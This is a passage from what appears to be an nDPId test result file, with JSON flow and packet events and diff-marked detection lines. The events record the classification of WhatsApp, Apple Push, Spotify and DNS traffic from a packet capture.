{"query":"g.whatsapp.net","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"157.240.20.53"}} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455688201,"flow_last_seen":1561455688201,"flow_idle_time":7580000,"flow_min_l4_payload_len":1440,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1440,"flow_avg_l4_payload_len":1440,"midstream":1,"thread_ts_msec":1561455688201,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"17.242.60.84","src_port":49354,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 02420{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1561455688201,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1506,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1506,"pkt_l4_len":1472,"thread_ts_msec":1561455688201,"pkt":"xiwDYGpkkLkxKPrKCABFAgXUAABAAEAGJCjAqAIMEfI8VMDKFGdIDyQZ7pIeMIAQCAC0bwAAAQEICjTN8KY8skLCFwMDD+Ai5NOSopi\/6GqwlD\/tAZzY1QGzvljqTGTmGCJOrU3x8CYKomrYaziO5eZ4ouY8cCYpOJvKrDNJX33pdge2bBxjgZp3ciHlbT9gHcPpJV3HIK5K4Xwsy7N\/d9l3pDdGz5PHrVVzZeXakf14DKR+hXrIhRVy6hpv5t2VthQzM3sKU7KhJpL\/6a5Sp489WK3Z7dzYFK2J+ermhE1b03GDPIEb7MGTpTJQaqangZgy8gro1eaetAilk1o529zodA1M9O5BVqL2oF301LG+kaqQTY1SPLvOnn1MxBlBEbzmsfvPr0H7C5Xcv51kP+cMU9R39VU1KEVp3e+2GMmIXWxgb+NKRMo4d5o6BKoHJ36YKQ33eAmIMAcZsFkdzfDz5q2jCxngiuQsbQKoYL1rQHGV7CXWI3zE9edQrQPJaGQZaxu\/+b+1vqSWxtCMEOUMVSmhM+FpUOqnKqwXsN4BgvySE1+U34RH0SV6FPoBjF0WGfVjkUid\/lVZcbedi\/PfkG0yBpT2\/Is9EIUqT+5Azj96UOFZqIEtSsIYSrk7ySkvjrKz5bHkeMLQk1mxQwJByZOSa30oY5bmNGAgD00g7CKAigVgWl6pq33BURhk4PDRhLJn426pN8ndnOOPzVylhr5g1C978hT8qaiuW1hlXdPnoMeCp9hEy7A5ziIjQi\/j6SVmDBSjwtJ0oqoQ\/ul2VzP1hHUGnZiTl\/qoxKKUfFrrwqTto6BvQjrKNa8bmHfrJg1RkCF3YK1iU3RCTPB\/4c68wZU3wRZ8hH1dNOLSgkwNQHFvEa\/gv\/qOxZkCS+Hpja9b5OtYooCqZnURTItdIoosw\/pte6KHG8eCIx\/U7yLLCmLs4D6MQwGZZ2yJ9zt9zcZXv1g03W4UohfquGy0ioHzSnw\/O3jNSfyTyrsrgxGqBD7B02ehphvU7Ax3IIziLDpWGnOBTyjYVNl423Z+0c9qK5fdUeybRNKKbWmwJqAFyKo3Mn2oSjBse+IbmEyy74UtCrn7MO79P00k7ZwAdz4X9zs28aMTKpnGFfXXxKMpT0Dd5ofiYXaTFr2Jwybi92XLCleA2OWxMIUro0rxoo67fYKdVxbqwQCMyEw6LTznHMXWYOpkkn6VHuawZe8M1HJsON5lEoItuqd\/IBfWUMshGlV8OgIAoc3EW3VlOFAiqg0pqVqjmyE8T8wQAvejRCf2f7iThtrzSrjIJDgibkW3Ecp3KoIC1KVlhjp4HLMvTgc12F13bDzcsr4rYSNpgOus\/4N4UzMrQyfYM2uNlqx0HfPLs50MVn\/Kyef0KdSuCHGqHLEJ+g1+EB9i2mop53wwymGotu9IoWgU02wrdRtoavOIQ5TMaPT9Jy+tmpyw9rSZn4YhMfxR72sCFIVM2eQlDOP2kti8y02qh8vwstuWp8ER3\/PKo9BgChhkuUmF5Df6lKXn1exWi67C9f1S5pc1iv33gDt3T0VcEHwoxmIh6MLrQ4LDUY7JX7mEuRfro3sR\/Ir2ufPPOhOBqsPV5YskVY9tWAevz7WMRn8EtRyvVaVHL3wxu1gErJNgcQ\/Af9fGR5KHI8lfrzLWY+bV9Q6PY8piE9FU2r7QV9Q5YgbBE6yKjPA3fOpiBOv+IVCsLXJNVdRvAywibpuoJAy2z01Fc5o3x+ZW2eqdFSSyuDepi7EBv4YJnAtmqjCVimRnoZ68Pz\/ocEFw5tBKkvU5uadJKwflJJ0hJUUOKwAQFCWvvApj3f356wTvDmU788W1R\/Vmzin60ZrsL16uD4sDmXGOueQVWddIzbIT0jyuT6IK9gJjCyELuMZhwwjNJ\/gEh8+\/PwFaVXbn\/1dsvjpj0IhPwCusRttL60194v983ySgSQpQrf9f+n\/rJIRYwpsq4DBRu9SydD72zD93mD4idl3s3tsUHh6rp5k7Bf4L"} -00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455688201,"flow_last_seen":1561455688201,"flow_idle_time":7580000,"flow_min_l4_payload_len":1440,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1440,"flow_avg_l4_payload_len":1440,"midstream":1,"thread_ts_msec":1561455688201,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"17.242.60.84","src_port":49354,"dst_port":5223,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"ApplePush","breed":"Acceptable","category":"Cloud"}} +00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455688201,"flow_last_seen":1561455688201,"flow_idle_time":7580000,"flow_min_l4_payload_len":1440,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1440,"flow_avg_l4_payload_len":1440,"midstream":1,"thread_ts_msec":1561455688201,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"17.242.60.84","src_port":49354,"dst_port":5223,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"ApplePush","breed":"Acceptable","category":"Cloud"}} 02419{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1561455688202,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1506,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1506,"pkt_l4_len":1472,"thread_ts_msec":1561455688202,"pkt":"xiwDYGpkkLkxKPrKCABFAgXUAABAAEAGJCjAqAIMEfI8VMDKFGdIDym57pIeMIAQCADYpQAAAQEICjTN8KY8skLCFtVfgrozcBhAJsfsFvLQO\/UNbKaPAKskPEHc2H7HNZvZ0KHfZ\/KP+B9OyPm0SdMSjavTXp1RBX4n8dtnNy7ldwySyG0XJJWeRoZiiRtgXrZdFFD0QAS3Pe1DBo\/FUctyy9XBKqwrw5v92Jj5UtBctOxUvfejQ1SPTAJ5IukXOUTVRhF+GJ6uJpn2Gyv2J\/hXj4mZyNeIliL2I7bOA3ury1GpGWko+MWMnPSKdWfc+5iZ8htj49VB2VDsL+uaCsidGqZX708pkKajJgAtzAX6+OwUhPXab61vOJn2ZVsE84On3Sc1Kl0WWtXgaA5Kty9ym4wLqQYEYP55F5oeJX4cTBOZRUcxhyM2DEPfiJE4aGH7aPKJO1JXXtoaeR6aRsid5OY044cRXoCwjbqa8kVLoyG\/1hSUaMwK17Rm6Nq+PbrF+ED8fmHgN\/1Dutcz+R4xma\/dfBoQDryBVCTEwOthrl7LLjRmNDBA\/nKPrgUx1pUPyir\/k\/cBNu5VmA9ROEDXJTcYsaqkjSroNougihkTVcfxMwA0V1eozYWnylZYZfyg3u53u+M+Do2uu\/vpHb6ZX\/5fq7AfMO72tRX4kcflTeOHJPV42uX70ZwC1O+A2X8wG0wRrb8uK6OFhHts3S52N3FVIqWr3CBOEKtXus3msBLphIaEqtw7dKWimDDeKkgZyeDybQGBbwSqGgwXI4sXoyN6QNVYT2T4i6kGXwJ8KRo8HtR5yB7rhqGJ7va7Tq2PlcpSnVIQRwao1mofCncrFLbOpoxslAuFLv8G+fW1GEiueEIhAplFAErT8lEbc6sY9uI88S0O6mDpNBlvCBLanRfw12SWljEVA4Wh2w31ojL9SCLJgyYKb3rrXT3V5i0AGJxXutmEyz9yTXUcoSU1YUo3WfmVLfx6RyxgbfoU7yfB7G33wI6gfsYIkzsYXlIla2ZkFjlWmYTCmfyEh6mVsXCVMnp1BhZdWj+7bWgfM4VrhMG0uNxDM0Z53kq9r7jYLXP1URavTKVNjY1WxQ1RAuRJtVPSgtQELf6AAzGAMW947SHl7bPC94gub8Kmqytrgl8ICRtP21Twca8YlwoKzIkJ0ROGsHSJ1IUBnknB2X57XNTUY80EyrwKOEYdXqBbK5\/uwztG9gvPjPu8PKqPu7OCXZj1ZBnnEX2PjjdGe8\/qo\/GKpAlJAuol7xe33zGz401h7+ux36y894Mbarjx1CDQxx9YqwY6Lr4EHSyCq\/xOaCM9Ig4AmEcFYjNP6niCHmI6fO24v\/GQB6WXdzSw2ClyCXHYbvr4Qqi+4qXoeh2xXDeKjcBBfLtEOni++s2q3gzhbAvkZLj\/NmeA2TXw0Z3iDbzj8\/Y4RPkg+eKwZkIo3UDfKsFnJdpryN60+cHgLr\/4b6yqkGde7QP698bVNcwUBDmhcPTGUF72BSrLQvrtwQZtWbAZrNkztpBLnQ0QkqUG4rCER6dvRqYMKv5dFfseMTa1Q1gUuqPbbz23yUKTRtop\/\/Lht4EEFlQYsfbz48ddhpIGiMg5mZbcRDG3SabEXgtzSNVHYYfQC6vW4pikjByoIlKAdhA6SR3Oh3PU52UQkf1H00x5\/\/1hV8lcpLckyN2LNUVFAYrwz5do38QxPssBrJ+3S6\/aEGPegc3B67mnX5V9KdAWJTKT9mA6BOcYDIvqCcaofS9sLdAjWNazl\/6YRqmsk\/JZn6nsHta+t4co6kKrh8ZoenAhtwbNaOVmExbItteeviDeqFUd2pkhp3kXIT8d6YMdXIloWHR8vT7oGOwNL5sNWFZXjAeqyXFLohZVoKLbw4szdHzrmDOl0IHwY6y6lYvTSYc6OyNhkaHXFSCKUjvAFZPuWmliraxAT7phw5quixNUJhdRcYng0LMN9J3KAyHFA8Ber5WNyIqMxWZ5wh4eVaY0B\/wQ"} 02080{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1561455688202,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1255,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1255,"pkt_l4_len":1221,"thread_ts_msec":1561455688202,"pkt":"xiwDYGpkkLkxKPrKCABFAgTZAABAAEAGJSPAqAIMEfI8VMDKFGdIDy9Z7pIeMIAYCACWYAAAAQEICjTN8KY8skLChD9+sl9zTIn+9oKwtdTi9Vdi\/cqtS9SsuLktLexhq+H6HSh0nUz\/pR7lGjfA8jUSbTLAiEYeFmvZtDgZTjhibXwhbTyW2ej1slX5wS0YUeKb381u+fexhn3xRkOOgFD2lHUCDNs6ZDxZ3MgjWXZ\/6y+5+G4Cr5MmO9LbbXgHM2tCoGf6bFpAilIbDNDjf72PZn2d6eJMciO25CCni3NwF1VQe25Bd9JCM8RNSipKwwpntSqY6SidwnIyNKgMjNfj+GMhuOpcSsAcRSjT\/L\/y6Nc7rkRDfvgoZpO7IrcZRsLerm0SSzH8usyI2xA+WCvEPlDoV\/87+olgpceCoKG1cf6TrD9aD7Lh7Yzi2mRYXX50kN9XYC9UhK+eEqcUiK0EA6ia38NkceSip2pBuv85\/091UH5OzSLrTUOJg+XVoE7ssGb7XKiRE+FOZu+zmhmuXn2Ujg8u76JsqT+uY0KkCyvwkXLeCV2kPGxz31MiSwGtNtz1oNvEGHur+FQDs\/zPpy1TfX803cqFKkblAu9BFTe4MXIK6IqhxFJcK3dj\/d8o2Zlvxu2S2NA3FH3zT7CWqacXhL+wQyS+\/DALOFfsZZCyD97Lwmcig1rgISji1T9qsBO4dRFWt5bVa2GoIozmHRLhPE\/xUBXrVvCjMLlRXbBby9l3tFLBkeNarajglfyHMtazotsPWceBe13wiPjaSciJqd486cT5nmripbb2TNv6m2QS+yBxolanBtMMlalvyClJnjFYXmEMA\/Cqafcjah0LpamWi5cGxlhK2o7VpcXk60WiDqklprDwU1C6AQQ3t9+In381BWOH2ylFLvtkYQS6mza73M7ORMV9T+VX4ja00u4BItehp2lgwr5wZ9hQu6lejNiwFYLaMPe7D\/bAwWtcZeYT8kAUL9H2S1idX7efThRI\/sFUnhFydcfZzFx9yoqvQ\/XNBIf8hR2ZwEmxUM7nHYq2mZ+\/B91bETK14kZx6AmSi1jqJABWenJppvp4cXzcY1BWUqJk0PLYkAexhw7t652If5IzcojeSdWFP2lhdau7nHX6G7lW4Utg7ZWXLyccWSWSv6ha+LeiDlED1cCwY2vVHkPEKRqluaQYKLl2qvR1wE3m0usuIl4q2MEc3z7A5MGmXicgQHspwoVe96OedZ9UbKdxn5F5OBTgOA+JY4EBKs3\/51SigijtnbNr7w00IZM1a32DUVsHDNnCKoJQHhPhULTSuboR4FgTKv5jA8DkAaFXzOTQQMYjx7YZD+FVCVnmqRcXzRQCUejaACj05EFq7vsiXpx9kEWnOGLDfJ22A0AjBRXoBK9EYB2xjWa+gzWXLgtnfTfAdhzT3lkAyklF\/qQA0sttDRgDxUQ4slW4E3BzVFH0h4GehIXJZzWEseP9XQr0J1UhTOB7Dv78mCeQyIVzY5PpIKGqL37IUaJV6gk4viji4bM8JRt522Xsc3xIrKuiMjhRRmYQYZR2\/fsuI+jWL\/oLRyVbeQmMYbj2qIY8qMyxD0\/HUbbJCm1sWV3U2RsK1wnhcO2gFFVKyPqfKwE0xDwAtsxVH6ZCeakAFNP5dRNlfhay6WJ8owHDTw=="} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":11,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455688445,"flow_last_seen":1561455688445,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1561455688445,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1561455688445,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1561455688445,"pkt":"\/\/\/\/\/\/\/\/xiwDYGpkCABFAABI7iMAAEARBjHAqAIBwKgC\/+EV4RUANEtUU3BvdFVkcDC64ScQKi2g\/wABAARIlcIDyUSzc\/3fJAksKuG26pMF0apN5Ek="} -00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455688445,"flow_last_seen":1561455688445,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1561455688445,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Spotify","breed":"Acceptable","category":"Music"}} +00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455688445,"flow_last_seen":1561455688445,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1561455688445,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Spotify","breed":"Acceptable","category":"Music"}} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":12,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455688704,"flow_last_seen":1561455688704,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1561455688704,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"157.240.20.53","src_port":49355,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1561455688704,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1561455688704,"pkt":"xiwDYGpkkLkxKPrKCABFAABAAABAAEAGxd7AqAIMnfAUNcDLFGab0QrZAAAAALDC\/\/8eGAAAAgQFtAEDAwYBAQgKNM3yoAAAAAAEAgAA"} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1561455688744,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1561455688744,"pkt":"kLkxKPrKxiwDYGpkCABFAAA8AAAAAFMG8uKd8BQ1wKgCDBRmwMsu6BkVm9EK2qASbHAbGAAAAgQFeAQCCAoefUIDNM3yoAEDAwg="} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1561455688841,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1561455688841,"pkt":"xiwDYGpkkLkxKPrKCABFAAA0AABAAEAGxerAqAIMnfAUNcDLFGab0QraLugZFoAQCAytcgAAAQEICjTN8zsefUID"} -00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":15,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1561455688704,"flow_last_seen":1561455689011,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":256,"flow_tot_l4_payload_len":256,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1561455689011,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"157.240.20.53","src_port":49355,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":15,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1561455688704,"flow_last_seen":1561455689011,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":256,"flow_tot_l4_payload_len":256,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1561455689011,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"157.240.20.53","src_port":49355,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":60,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455689728,"flow_last_seen":1561455689728,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1561455689728,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"192.168.2.1","src_port":55296,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":60,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1561455689728,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1561455689728,"pkt":"xiwDYGpkkLkxKPrKCABFAABL058AAP8RYqTAqAIMwKgCAdgAADUAN5FDM2kBAAABAAAAAAAADG1lZGlhLW14cDEtMQNjZG4Id2hhdHNhcHADbmV0AAABAAE="} -00795{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":60,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455689728,"flow_last_seen":1561455689728,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1561455689728,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"192.168.2.1","src_port":55296,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.WhatsAppFiles","breed":"Acceptable","category":"Download"},"dns": {"query":"media-mxp1-1.cdn.whatsapp.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00795{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":60,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455689728,"flow_last_seen":1561455689728,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1561455689728,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"192.168.2.1","src_port":55296,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.WhatsAppFiles","breed":"Acceptable","category":"Download"},"dns": {"query":"media-mxp1-1.cdn.whatsapp.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00519{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":61,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1561455689761,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"thread_ts_msec":1561455689761,"pkt":"kLkxKPrKxiwDYGpkCABFAABbphoAAEARTxrAqAIBwKgCDAA12AAAR3hsM2mBgAABAAEAAAAADG1lZGlhLW14cDEtMQNjZG4Id2hhdHNhcHADbmV0AAABAAHADAABAAEAAABFAAQfDVYz"} -00808{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":61,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1561455689728,"flow_last_seen":1561455689761,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":110,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1561455689761,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"192.168.2.1","src_port":55296,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.WhatsAppFiles","breed":"Acceptable","category":"Download"},"dns": {"query":"media-mxp1-1.cdn.whatsapp.net","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"31.13.86.51"}} +00808{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":61,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1561455689728,"flow_last_seen":1561455689761,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":110,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1561455689761,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"192.168.2.1","src_port":55296,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.WhatsAppFiles","breed":"Acceptable","category":"Download"},"dns": {"query":"media-mxp1-1.cdn.whatsapp.net","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"31.13.86.51"}} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":64,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455689909,"flow_last_seen":1561455689909,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1561455689909,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"31.13.86.51","src_port":50503,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":64,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1561455689909,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1561455689909,"pkt":"xiwDYGpkkLkxKPrKCABFAABAAABAAEAGAsTAqAIMHw1WM8VHAbtOnG1kAAAAALDC\/\/9BlgAAAgQFtAEDAwcBAQgKNM4E3wAAAAAEAgAA"} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":65,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1561455689928,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1561455689928,"pkt":"kLkxKPrKxiwDYGpkCABFAAA8AAAAAFQGLsgfDVYzwKgCDAG7xUfuAwj8TpxtZaASbHDC9wAAAgQFeAQCCAqHqaVzNM4E3wEDAwg="} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":66,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1561455690036,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1561455690036,"pkt":"xiwDYGpkkLkxKPrKCABFAAA0AABAAEAGAtDAqAIMHw1WM8VHAbtOnG1l7gMI\/YAQBAZZdQAAAQEICjTOBV2HqaVz"} -00965{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":67,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1561455689909,"flow_last_seen":1561455690039,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1561455690039,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"31.13.86.51","src_port":50503,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WhatsAppFiles","breed":"Acceptable","category":"Download"},"tls": 